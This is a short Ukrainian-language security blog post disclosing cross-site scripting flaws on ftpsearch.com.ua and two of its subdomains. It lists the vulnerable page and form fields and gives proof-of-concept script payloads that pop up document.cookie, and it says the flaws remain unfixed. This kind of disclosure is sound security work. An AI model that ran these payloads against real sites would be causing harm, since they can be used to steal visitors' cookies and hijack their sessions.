Websecurity - Веб безпека

08.08.2007

У лютому, 09.02.2007 (а також додатково сьогодні), я знайшов Cross-Site Scripting уразливості на проекті ftpsearch.com.ua. Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливості з’явиться пізніше.

06.01.2008

XSS:

http://ftpsearch.com.ua

POST запит на сторінці http://ftpsearch.com.ua/profiles.php?
sid=20070808&what=emailstory:

"><script>alert(document.cookie)</script>В полях: Отправитель, Адрес отправителя, Получатель, Адрес получателя.

</textarea><script>alert(document.cookie)</script>В полі: Короткое сообщение.

http://i.ftpsearch.com.ua

• alert(document.cookie)
• цікавий
• html включення

http://google.ftpsearch.com.ua

• alert(document.cookie)
• цікавий
• html включення

Дані уразливості досі не виправлені.

This entry was posted on 19:40 06.01.2008 and is filed under Уразливості. You can follow any responses to this entry through the RSS 2.0 feed.